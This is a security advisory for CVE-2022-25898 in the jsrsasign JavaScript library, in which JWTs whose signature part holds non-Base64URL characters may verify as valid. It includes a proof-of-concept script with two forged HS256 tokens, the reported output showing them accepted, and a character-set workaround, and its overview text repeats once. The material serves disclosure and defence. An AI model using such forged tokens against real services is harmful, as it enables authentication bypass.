jsrsasign is a free pure JavaScript cryptographic library.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature: a JWS or JWT whose signature part contains characters outside the Base64URL alphabet (special characters or numeric escape sequences) may be accepted as valid by mistake.
Workaround:
Before calling JWS.verify() or JWS.verifyJWT(), check that the JWS or JWT string contains only Base64URL characters and dots.
PoC:
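// PoC for the jsrsasign signature-verification issue described above.
// Run it as a plain CommonJS script (node poc.js) against an affected install.
// NOTE: as rendered here, the invalidJwt2 literal contains `\1`, `\2`, `\222`
// style sequences, which are legacy octal escapes -- they only parse in a
// sloppy-mode script (strict mode / ES modules reject them), and at runtime
// they become control characters rather than literal backslashes. Confirm
// against the original report whether backslashes were intended.
const KJUR = require('jsrsasign');
require('jsrsasign-util'); // loaded by the original report; nothing below uses it
// [email protected]
// (package@version of the tested build; the version is masked in this
// rendering -- the advisory states that versions below 10.5.25 are affected)

// How the valid HS256 JWT below was produced (kept from the original report;
// the iss/aud values are shown decoded from the token's payload segment --
// the report's rendering had wrapped them in a link-rewriting proxy URL):
// var oHeader = {alg: 'HS256', typ: 'JWT'};
// // Payload
// var oPayload = {};
// var tNow = KJUR.jws.IntDate.get('now');
// var tEnd = KJUR.jws.IntDate.get('now + 1year');
// oPayload.iss = "http://foo.com";
// oPayload.sub = "mailto:mike@foo.com";
// oPayload.nbf = tNow;
// oPayload.iat = tNow;
// oPayload.exp = tEnd;
// oPayload.jti = "id123456";
// oPayload.aud = "http://foo.com/employee";
// // Sign JWT, password=616161
// var sHeader = JSON.stringify(oHeader);
// var sPayload = JSON.stringify(oPayload);
// var sJWT = KJUR.jws.JWS.sign("HS256",sHeader,sPayload,"616161");

/**
 * Workaround recommended by the advisory: before handing a compact JWS/JWT to
 * JWS.verify() / JWS.verifyJWT(), require that the whole string consists only
 * of Base64URL characters (A-Z a-z 0-9 - _) and the '.' separator, so that a
 * token with foreign characters in its signature part is rejected up front
 * instead of possibly being accepted by an affected version.
 * @param {unknown} token - candidate compact JWS/JWT
 * @returns {boolean} true only for a non-empty string made of Base64URL chars and dots
 */
const isBase64UrlDotSafe = (token) =>
  typeof token === 'string' && /^[A-Za-z0-9_.-]+$/.test(token);

// Verifying valid and invalid HS256 JWTs.
// valid jwt
const validJwt = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchnot7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";
// invalid jwt: special characters inserted into the signature part
const invalidJwt1 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno!@#$%^&*()!@#$%^&*()!@#$%^&*()!@#$%^&*()t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";
// invalid jwt: additional numbers and escape sequences inserted into the signature part
const invalidJwt2 = "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJpc3MiOiJodHRwOi8vZm9vLmNvbSIsInN1YiI6Im1haWx0bzptaWtlQGZvby5jb20iLCJuYmYiOjE2NTUyMjk3MjksImlhdCI6MTY1NTIyOTcyOSwiZXhwIjoxNjg2NzY1NzI5LCJqdGkiOiJpZDEyMzQ1NiIsImF1ZCI6Imh0dHA6Ly9mb28uY29tL2VtcGxveWVlIn0.eqrgPFuchno\1\1\2\3\4\2\2\3\2\1\2\222\3\1\1\2\2\2\2\2\2\2\2\2\2\2\2\222\23\2\2\2\2t7HgslW8S1xQUkTDBW-_cyhrPgOOFRzI";

// Output labels are kept byte-for-byte from the original report so the
// observed results can be compared directly.
const cases = [
  ['valid hs256 Jwt: ', validJwt],
  ['invalid hs256 Jwt by special signs: ', invalidJwt1],
  ['invalid hs256 Jwt by additional numbers and slashes: ', invalidJwt2],
];

// 1. Library verification alone. On an affected version the report observed:
//    valid Jwt: true
//    invalid Jwt by special signs: true
//    invalid Jwt by additional numbers and slashes: true
for (const [label, jwt] of cases) {
  const isValid = KJUR.jws.JWS.verifyJWT(jwt, "616161", { alg: ['HS256'] });
  console.log(`${label}${isValid}`);
}

// 2. The advisory's workaround applied to the same tokens: only validJwt
//    passes the character-set pre-check; the two malformed tokens are
//    rejected before verifyJWT() would be reached.
for (const [label, jwt] of cases) {
  console.log(`pre-check ${label}${isBase64UrlDotSafe(jwt)}`);
}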
Overview
jsrsasign is a free pure JavaScript cryptographic library.
Affected versions of this package are vulnerable to Improper Verification of Cryptographic Signature: a JWS or JWT whose signature part contains characters outside the Base64URL alphabet (special characters or numeric escape sequences) may be accepted as valid by mistake.
Workaround:
Before calling JWS.verify() or JWS.verifyJWT(), check that the JWS or JWT string contains only Base64URL characters and dots.
PoC:
Remediation
Upgrade jsrsasign to version 10.5.25 or higher.
References
SNYK-JS-JSRSASIGN-2869122
(CVE-2022-25898) [email protected]